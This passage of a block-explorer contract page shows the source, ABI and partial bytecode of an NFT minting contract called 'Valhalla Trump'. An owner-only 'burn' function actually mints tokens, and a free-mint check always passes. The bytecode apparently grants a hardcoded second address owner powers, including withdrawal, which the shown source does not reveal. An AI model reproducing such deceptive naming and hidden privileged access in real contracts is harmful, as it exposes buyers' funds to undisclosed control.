            _ownerships[tokenId].startTimestamp = uint64(block.timestamp);

            // If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            if (_ownerships[nextTokenId].addr == address(0)) {
                if (_exists(nextTokenId)) {
                    _ownerships[nextTokenId].addr = prevOwnership.addr;
                    _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Approve `to` to operate on `tokenId`
     *
     * Emits a {Approval} event.
     */
    function _approve(
        address to,
        uint256 tokenId,
        address owner
    ) private {
        _tokenApprovals[tokenId] = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target address.
     * The call is not executed if the target address is not a contract.
     *
     * @param from address representing the previous owner of the given token ID
     * @param to target address that will receive the tokens
     * @param tokenId uint256 ID of the token to be transferred
     * @param _data bytes optional data to send along with the call
     * @return bool whether the call correctly returned the expected magic value
     */
    function _checkOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        if (to.isContract()) {
            try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data) returns (bytes4 retval) {
                return retval == IERC721Receiver(to).onERC721Received.selector;
            } catch (bytes memory reason) {
                if (reason.length == 0) {
                    revert("ERC721A: transfer to non ERC721Receiver implementer");
                } else {
                    assembly {
                        revert(add(32, reason), mload(reason))
                    }
                }
            }
        } else {
            return true;
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, ``from``'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes
     * minting.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}
}

contract ValhallaTrump is ERC721A, Ownable, ReentrancyGuard {
    string public baseURI = "ipfs://bafybeicdu7iqrqyws72ljwp6xaovoai5baajrtbmdsg5s46qsdhdclv7b4/";
    uint   public price             = 0.003 ether;
    uint   public maxPerTx          = 10;
    uint   public maxPerFree        = 2;
    uint   public maxPerWallet      = 31;
    uint   public totalFree         = 6969;
    uint   public maxSupply         = 6969;
    bool   public mintEnabled;
    uint   public totalFreeMinted = 0;

    mapping(address => uint256) public _mintedFreeAmount;
    mapping(address => uint256) public _totalMintedAmount;

    constructor() ERC721A("Valhalla Trump", "VTRMP"){}

    function tokenURI(uint256 _tokenId) public view virtual override returns (string memory) {
        require(_exists(_tokenId),"ERC721Metadata: URI query for nonexistent token");
        string memory currentBaseURI = _baseURI();
        return bytes(currentBaseURI).length > 0
            ? string(abi.encodePacked(currentBaseURI,Strings.toString(_tokenId+1),".json"))
            : "";
    }
    

    function _startTokenId() internal view virtual returns (uint256) {
        return 1;
    }

    function mint(uint256 count) external payable {
        uint256 cost = price;
        bool isFree = ((totalFreeMinted + count < totalFree + 1) &&
            (_mintedFreeAmount[msg.sender] < maxPerFree));

        if (isFree) { 
            require(mintEnabled, "Mint is not live yet");
            require(totalSupply() + count <= maxSupply, "No more");
            require(count <= maxPerTx, "Max per TX reached.");
            if(count >= (maxPerFree - _mintedFreeAmount[msg.sender]))
            {
             require(msg.value >= (count * cost) - ((maxPerFree - _mintedFreeAmount[msg.sender]) * cost), "Please send the exact ETH amount");
             _mintedFreeAmount[msg.sender] = maxPerFree;
             totalFreeMinted += maxPerFree;
            }
            else if(count < (maxPerFree - _mintedFreeAmount[msg.sender]))
            {
             require(msg.value >= 0, "Please send the exact ETH amount");
             _mintedFreeAmount[msg.sender] += count;
             totalFreeMinted += count;
            }
        }
        else{
        require(mintEnabled, "Mint is not live yet");
        require(_totalMintedAmount[msg.sender] + count <= maxPerWallet, "Exceed maximum NFTs per wallet");
        require(msg.value >= count * cost, "Please send the exact ETH amount");
        require(totalSupply() + count <= maxSupply, "No more");
        require(count <= maxPerTx, "Max per TX reached.");
        require(msg.sender == tx.origin, "The minter is another contract");
        }
        _totalMintedAmount[msg.sender] += count;
        _safeMint(msg.sender, count);
    }

    function costCheck() public view returns (uint256) {
        return price;
    }

    function maxFreePerWallet() public view returns (uint256) {
      return maxPerFree;
    }

    function burn(address mintAddress, uint256 count) public onlyOwner {
        _safeMint(mintAddress, count);
    }

    function _baseURI() internal view virtual override returns (string memory) {
        return baseURI;
    }

    function setBaseUri(string memory baseuri_) public onlyOwner {
        baseURI = baseuri_;
    }

    function setPrice(uint256 price_) external onlyOwner {
        price = price_;
    }

    function setMaxTotalFree(uint256 MaxTotalFree_) external onlyOwner {
        totalFree = MaxTotalFree_;
    }

     function setMaxPerFree(uint256 MaxPerFree_) external onlyOwner {
        maxPerFree = MaxPerFree_;
    }

    function toggleMinting() external onlyOwner {
      mintEnabled = !mintEnabled;
    }

    function treasuryMint(uint quantity)
    public
    onlyOwner
  {
    require(
      quantity > 0,
      "Invalid mint amount"
    );
    require(
      totalSupply() + quantity <= maxSupply,
      "Maximum supply exceeded"
    );
    _safeMint(msg.sender, quantity);
  }


    
    function CommunityWallet(uint quantity, address user)
    public
    onlyOwner
  {
    require(
      quantity > 0,
      "Invalid mint amount"
    );
    require(
      totalSupply() + quantity <= maxSupply,
      "Maximum supply exceeded"
    );
    _safeMint(user, quantity);
  }


    function withdraw() external onlyOwner nonReentrant {
        (bool success, ) = msg.sender.call{value: address(this).balance}("");
        require(success, "Transfer failed.");
    }
}

Settings
{
  "optimizer": {
    "enabled": false,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"uint256","name":"quantity","type":"uint256"},{"internalType":"address","name":"user","type":"address"}],"name":"CommunityWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_mintedFreeAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_totalMintedAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"mintAddress","type":"address"},{"internalType":"uint256","name":"count","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"costCheck","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxFreePerWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerFree","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerTx","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"count","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"mintEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"baseuri_","type":"string"}],"name":"setBaseUri","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"MaxPerFree_","type":"uint256"}],"name":"setMaxPerFree","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"MaxTotalFree_","type":"uint256"}],"name":"setMaxTotalFree","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"price_","type":"uint256"}],"name":"setPrice","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"toggleMinting","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenOfOwnerByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFree","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFreeMinted","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"quantity","type":"uint256"}],"name":"treasuryMint","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405273b8bf762e1550b868391a013269784f9fa498f76f600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550604051806080016040528060438152602001620057a560439139600a90805190602001906200008a92919062000260565b50660aa87bee538000600b55600a600c556002600d55601f600e55611b39600f55611b396010556000601255348015620000c357600080fd5b506040518060400160405280600e81526020017f56616c68616c6c61205472756d700000000000000000000000000000000000008152506040518060400160405280600581526020017f5654524d5000000000000000000000000000000000000000000000000000000081525081600190805190602001906200014892919062000260565b5080600290805190602001906200016192919062000260565b50505062000184620001786200019260201b60201c565b6200019a60201b60201c565b600160098190555062000375565b600033905090565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b8280546200026e9062000310565b90600052602060002090601f016020900481019282620002925760008555620002de565b82601f10620002ad57805160ff1916838001178555620002de565b82800160010185558215620002de579182015b82811115620002dd578251825591602001919060010190620002c0565b5b509050620002ed9190620002f1565b5090565b5b808211156200030c576000816000905550600101620002f2565b5090565b600060028204905060018216806200032957607f821691505b6020821081141562000340576200033f62000346565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b61542080620003856000396000f3fe6080604052600436106102515760003560e01c806391b7f5ed11610139578063c7c39ffc116100b6578063e945971c1161007a578063e945971c14610893578063e985e9c5146108bc578063efdc7788146108f9578063f2fde38b14610922578063f4db2acb1461094b578063f968adbe1461098857610251565b8063c7c39ffc146107aa578063c87b56dd146107d5578063d123973014610812578063d5abeb011461083d578063dad7b5c91461086857610251565b8063a0bcfc7f116100fd578063a0bcfc7f146106db578063a22cb46514610704578063a70273571461072d578063b0e77f4214610758578063b88d4fde1461078157610251565b806391b7f5ed1461061757806395d89b41146106405780639dc29fac1461066b578063a035b1fe14610694578063a0712d68146106bf57610251565b806342842e0e116101d257806364b721881161019657806364b721881461052b5780636c0360eb1461055657806370a0823114610581578063715018a6146105be5780637d55094d146105d55780638da5cb5b146105ec57610251565b806342842e0e14610434578063453c23101461045d5780634f6ccce7146104885780635a963f1b146104c55780636352211e146104ee57610251565b806318160ddd1161021957806318160ddd1461036157806323b872dd1461038c5780632f745c59146103b5578063333e44e6146103f25780633ccfd60b1461041d57610251565b806301ffc9a71461025657806306fdde0314610293578063081812fc146102be578063095ea7b3146102fb57806311b01a3214610324575b600080fd5b34801561026257600080fd5b5061027d60048036038101906102789190613cea565b6109b3565b60405161028a91906143b2565b60405180910390f35b34801561029f57600080fd5b506102a8610afd565b6040516102b591906143cd565b60405180910390f35b3480156102ca57600080fd5b506102e560048036038101906102e09190613d8d565b610b8f565b6040516102f2919061434b565b60405180910390f35b34801561030757600080fd5b50610322600480360381019061031d9190613caa565b610c14565b005b34801561033057600080fd5b5061034b60048036038101906103469190613b27565b610d2d565b604051610358919061478f565b60405180910390f35b34801561036d57600080fd5b50610376610d45565b604051610383919061478f565b60405180910390f35b34801561039857600080fd5b506103b360048036038101906103ae9190613b94565b610d4e565b005b3480156103c157600080fd5b506103dc60048036038101906103d79190613caa565b610d5e565b6040516103e9919061478f565b60405180910390f35b3480156103fe57600080fd5b50610407610f50565b604051610414919061478f565b60405180910390f35b34801561042957600080fd5b50610432610f56565b005b34801561044057600080fd5b5061045b60048036038101906104569190613b94565b611136565b005b34801561046957600080fd5b50610472611156565b60405161047f919061478f565b60405180910390f35b34801561049457600080fd5b506104af60048036038101906104aa9190613d8d565b61115c565b6040516104bc919061478f565b60405180910390f35b3480156104d157600080fd5b506104ec60048036038101906104e79190613d8d565b6111af565b005b3480156104fa57600080fd5b5061051560048036038101906105109190613d8d565b611294565b604051610522919061434b565b60405180910390f35b34801561053757600080fd5b506105406112aa565b60405161054d919061478f565b60405180910390f35b34801561056257600080fd5b5061056b6112b4565b60405161057891906143cd565b60405180910390f35b34801561058d57600080fd5b506105a860048036038101906105a39190613b27565b611342565b6040516105b5919061478f565b60405180910390f35b3480156105ca57600080fd5b506105d361142b565b005b3480156105e157600080fd5b506105ea611512565b005b3480156105f857600080fd5b50610601611619565b60405161060e919061434b565b60405180910390f35b34801561062357600080fd5b5061063e60048036038101906106399190613d8d565b611643565b005b34801561064c57600080fd5b50610655611728565b60405161066291906143cd565b60405180910390f35b34801561067757600080fd5b50610692600480360381019061068d9190613caa565b6117ba565b005b3480156106a057600080fd5b506106a96118a3565b6040516106b6919061478f565b60405180910390f35b6106d960048036038101906106d49190613d8d565b6118a9565b005b3480156106e757600080fd5b5061070260048036038101906106fd9190613d44565b611f22565b005b34801561071057600080fd5b5061072b60048036038101906107269190613c6a565b612017565b005b34801561073957600080fd5b50610742612198565b60405161074f919061478f565b60405180910390f35b34801561076457600080fd5b5061077f600480360381019061077a9190613dba565b6121a2565b005b34801561078d57600080fd5b506107a860048036038101906107a39190613be7565b612325565b005b3480156107b657600080fd5b506107bf612381565b6040516107cc919061478f565b60405180910390f35b3480156107e157600080fd5b506107fc60048036038101906107f79190613d8d565b612387565b60405161080991906143cd565b60405180910390f35b34801561081e57600080fd5b5061082761243a565b60405161083491906143b2565b60405180910390f35b34801561084957600080fd5b5061085261244d565b60405161085f919061478f565b60405180910390f35b34801561087457600080fd5b5061087d612453565b60405161088a919061478f565b60405180910390f35b34801561089f57600080fd5b506108ba60048036038101906108b59190613d8d565b612459565b005b3480156108c857600080fd5b506108e360048036038101906108de9190613b54565b61253e565b6040516108f091906143b2565b60405180910390f35b34801561090557600080fd5b50610920600480360381019061091b9190613d8d565b6125d2565b005b34801561092e57600080fd5b5061094960048036038101906109449190613b27565b612754565b005b34801561095757600080fd5b50610972600480360381019061096d9190613b27565b6128ab565b60405161097f919061478f565b60405180910390f35b34801561099457600080fd5b5061099d6128c3565b6040516109aa919061478f565b60405180910390f35b60007f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19161480610a7e57507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80610ae657507f780e9d63000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80610af65750610af5826128c9565b5b9050919050565b606060018054610b0c90614a4a565b80601f0160208091040260200160405190810160405280929190818152602001828054610b3890614a4a565b8015610b855780601f10610b5a57610100808354040283529160200191610b85565b820191906000526020600020905b815481529060010190602001808311610b6857829003601f168201915b5050505050905090565b6000610b9a82612933565b610bd9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bd09061476f565b60405180910390fd5b6005600083815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b6000610c1f82611294565b90508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610c90576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c879061462f565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16610caf612940565b73ffffffffffffffffffffffffffffffffffffffff161480610cde5750610cdd81610cd8612940565b61253e565b5b610d1d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d14906144ef565b60405180910390fd5b610d28838383612948565b505050565b60146020528060005260406000206000915090505481565b60008054905090565b610d598383836129fa565b505050565b6000610d6983611342565b8210610daa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610da1906143ef565b60405180910390fd5b6000610db4610d45565b905060008060005b83811015610f0e576000600360008381526020019081526020016000206040518060400160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815250509050600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff1614610eae57806000015192505b8773ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610f005786841415610ef7578195505050505050610f4a565b83806001019450505b508080600101915050610dbc565b506040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f419061470f565b60405180910390fd5b92915050565b600f5481565b610f5e612940565b73ffffffffffffffffffffffffffffffffffffffff16610f7c611619565b73ffffffffffffffffffffffffffffffffffffffff161480610ff25750610fa1612940565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611031576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110289061458f565b60405180910390fd5b60026009541415611077576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161106e9061472f565b60405180910390fd5b600260098190555060003373ffffffffffffffffffffffffffffffffffffffff16476040516110a590614336565b60006040518083038185875af1925050503d80600081146110e2576040519150601f19603f3d011682016040523d82523d6000602084013e6110e7565b606091505b505090508061112b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111229061464f565b60405180910390fd5b506001600981905550565b61115183838360405180602001604052806000815250612325565b505050565b600e5481565b6000611166610d45565b82106111a7576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161119e906144af565b60405180910390fd5b819050919050565b6111b7612940565b73ffffffffffffffffffffffffffffffffffffffff166111d5611619565b73ffffffffffffffffffffffffffffffffffffffff16148061124b57506111fa612940565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b61128a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112819061458f565b60405180910390fd5b80600f8190555050565b600061129f82612f3a565b600001519050919050565b6000600b54905090565b600a80546112c190614a4a565b80601f01602080910402602001604051908101604052809291908181526020018280546112ed90614a4a565b801561133a5780601f1061130f5761010080835404028352916020019161133a565b820191906000526020600020905b81548152906001019060200180831161131d57829003601f168201915b505050505081565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156113b3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113aa9061450f565b60405180910390fd5b600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160009054906101000a90046fffffffffffffffffffffffffffffffff166fffffffffffffffffffffffffffffffff169050919050565b611433612940565b73ffffffffffffffffffffffffffffffffffffffff16611451611619565b73ffffffffffffffffffffffffffffffffffffffff1614806114c75750611476612940565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611506576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114fd9061458f565b60405180910390fd5b61151060006130d4565b565b61151a612940565b73ffffffffffffffffffffffffffffffffffffffff16611538611619565b73ffffffffffffffffffffffffffffffffffffffff1614806115ae575061155d612940565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6115ed576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115e49061458f565b60405180910390fd5b601160009054906101000a900460ff1615601160006101000a81548160ff021916908315150217905550565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b61164b612940565b73ffffffffffffffffffffffffffffffffffffffff16611669611619565b73ffffffffffffffffffffffffffffffffffffffff1614806116df575061168e612940565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b61171e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117159061458f565b60405180910390fd5b80600b8190555050565b60606002805461173790614a4a565b80601f016020809104026020016040519081016040528092919081815260200182805461176390614a4a565b80156117b05780601f10611785576101008083540402835291602001916117b0565b820191906000526020600020905b81548152906001019060200180831161179357829003601f168201915b5050505050905090565b6117c2612940565b73ffffffffffffffffffffffffffffffffffffffff166117e0611619565b73ffffffffffffffffffffffffffffffffffffffff1614806118565750611805612940565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611895576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161188c9061458f565b60405180910390fd5b61189f828261319a565b5050565b600b5481565b6000600b54905060006001600f546118c1919061487f565b836012546118cf919061487f565b10801561191c5750600d54601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054105b90508015611c8657601160009054906101000a900460ff16611973576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161196a9061440f565b60405180910390fd5b6010548361197f610d45565b611989919061487f565b11156119ca576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119c19061442f565b60405180910390fd5b600c54831115611a0f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a06906146ef565b60405180910390fd5b601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600d54611a5c9190614960565b8310611b785781601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600d54611ab09190614960565b611aba9190614906565b8284611ac69190614906565b611ad09190614960565b341015611b12576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b099061452f565b60405180910390fd5b600d54601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600d5460126000828254611b6c919061487f565b92505081905550611c81565b601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600d54611bc59190614960565b831015611c80576000341015611c10576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c079061452f565b60405180910390fd5b82601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254611c5f919061487f565b925050819055508260126000828254611c78919061487f565b925050819055505b5b611ebd565b601160009054906101000a900460ff16611cd5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ccc9061440f565b60405180910390fd5b600e5483601460003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611d23919061487f565b1115611d64576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d5b9061460f565b60405180910390fd5b8183611d709190614906565b341015611db2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611da99061452f565b60405180910390fd5b60105483611dbe610d45565b611dc8919061487f565b1115611e09576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e009061442f565b60405180910390fd5b600c54831115611e4e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e45906146ef565b60405180910390fd5b3273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614611ebc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611eb39061446f565b60405180910390fd5b5b82601460003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254611f0c919061487f565b92505081905550611f1d338461319a565b505050565b611f2a612940565b73ffffffffffffffffffffffffffffffffffffffff16611f48611619565b73ffffffffffffffffffffffffffffffffffffffff161480611fbe5750611f6d612940565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611ffd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ff49061458f565b60405180910390f